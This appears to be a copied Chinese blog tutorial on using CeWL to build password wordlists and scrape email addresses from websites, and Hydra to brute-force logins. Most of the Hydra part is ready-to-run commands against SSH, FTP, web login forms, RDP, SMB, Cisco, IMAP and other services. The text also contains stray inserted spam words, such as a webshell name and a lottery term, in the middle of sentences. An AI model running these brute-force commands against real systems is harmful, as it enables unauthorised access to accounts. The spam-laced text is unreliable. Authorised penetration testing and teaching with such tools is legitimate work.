cewl和神奇九头蛇(hydra)

一、

CeWL是一款以爬虫模式在指定URL上收集单词的工具,可以将它收集到的单词纳入密码字典,以提高密码破解工具的成功率。
可以使用–help查看帮助
命令如下:

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt    (1.1.1.1可以是目标网站的ip地址,也可以是网址)
-m:最小单词长度
-d:爬网深度
-e:收集包含emali地址信息
-c:每个单词出现的次数
a.txt是生成的字典密码文件
支持基本,摘要,身份验证
支持代理;

1、默认方法

输入下面的命令来爬行给定的url,指定爬行深度,并且输出单词列表,这个列表可以用作破解密码的字典。中国菜刀

cewl http://www.ignitetechnologies.in/

2、在文件中存储字典

为了进行记录维持,可读性更好和作为未来参考,我们通常将输出的单词列表保存到txt文件中,我们可以使用-w参数来保存输出结果到txt文件中,命令如下:

cewl http://www.ignitetechnologies.in/ -w dict.txt

命令执行完成之后,我们切换到dict.txt所在的目录,在本文中是/root,来查看下文件,看看输出结果是否已经保存

cat dict.txt

3、生成指定长度的字典

如果你想生成指定单词长度的字典,你可以使用-m参数,这个参数的意思是指定最小的单词长度:

cewl http://www.ignitetechnologies.in/ -m 9

上面这条命令长度最小为9的单词,如下图所示,它会爬行给定网站,然后输出最少是9个字符的单词列表:

4、从网站获取email地址

你可以使用-e参数来启用邮件参数,配合-n参数使用,-n参数是在爬行给定网站时隐藏生成的单词列表:

cewl http://www.ignitetechnologies.in/ -n -e

成功找到网站中的一个邮件地址:

5、计算网站中单词重复的次数

如果你想统计网站中重复出现好几次的单词的数量,你可以使用-c参数来计数:天空彩

cewl http://www.ignitetechnologies.in/ -c

你可以看到给定网站中重复出现的单词的次数统计

6、增加爬行深度

如果你想增加爬行等级,来遍历网站中更多的单词来生成更大的字典,你可以使用-d参数,并指定一个爬行深度等级来进行更加深入的爬行,默认等级是2。

cewl http://www.ignitetechnologies.in/ -d 3

7、提取调试信息

你可以使用-d参数来启用调试模式,显示爬行网站时的错误和原始详细信息:

cewl http://www.ignitetechnologies.in/ --debug

8、Verbose模式

为了扩大网站的爬行结果来获取网站更加完整详细的信息,你可以加-v参数,也就是verbose模式。它不会生成字典,而是会dump网站上的信息。

cewl http://www.ignitetechnologies.in/ -v

9、生成alpha-numeric

如果你想生成字母数字字典,你可以使用—with-numbers参数

cewl http://testphp.vulnweb.com/ --with-numbers

10、cewl摘要/基础认证

如果存在一个认证页面来登录网站,那么上面的配置就行不通了,为了生成字典,我们需要使用下面的参数来绕过认证页面:

–auth_type: Digest/basic

–auth_user: Authentication username

–auth_pass: Authentication password

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v

或者

cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

可以看到http响应码是200,并且生成了字典

11、代理URL

如果网站使用了代理服务器,那么cewl的默认命令就无法生成字典了,比如下面这条命令:

cewl -w dict.txt http://192.168.1.103/wordpress/

不过你可以使用—proxy参数来开启代理URL,这样就可以生成字典了,比如下列命令:

cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

执行第二条命令之后,成功的输出了单词列表

二、

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。

1、参数说明:

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R 继续从上一次进度接着破解。 
 
-S 采用SSL链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户,对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。 
 
-P FILE 大写,指定密码字典。 
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数,默认为16-w TIME 设置最大超时的时间,单位秒,默认是30s。 
 
-v / -V 显示详细过程。 
 
server 目标ip 
 
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 
 
OPT 可选项

2、用法实例:

1、破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
hydra -l 用户名 -P 密码字典 IP ssh
 
 
2、破解ftp: 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
 
 
3、get方式提交,破解web登录: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
 
4、post方式提交,破解web登录: 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
(参数说明:-t同时线程数3-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 
 
 
5、破解https: 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
 
 
 
6、破解teamspeak: 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
 
 
 
7、破解cisco: 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
 
 
 
8、破解smb: 
hydra -l administrator -P pass.txt 10.36.16.18 smb 
 
 
 
9、破解pop3: 
hydra -l muts -P pass.txt my.pop3.mail pop3 
 
 
 
10、破解rdp: 
hydra ip rdp -l administrator -P pass.txt -V 
 
 
 
11、破解http-proxy: 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 
 
 
 
12、破解imap: 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章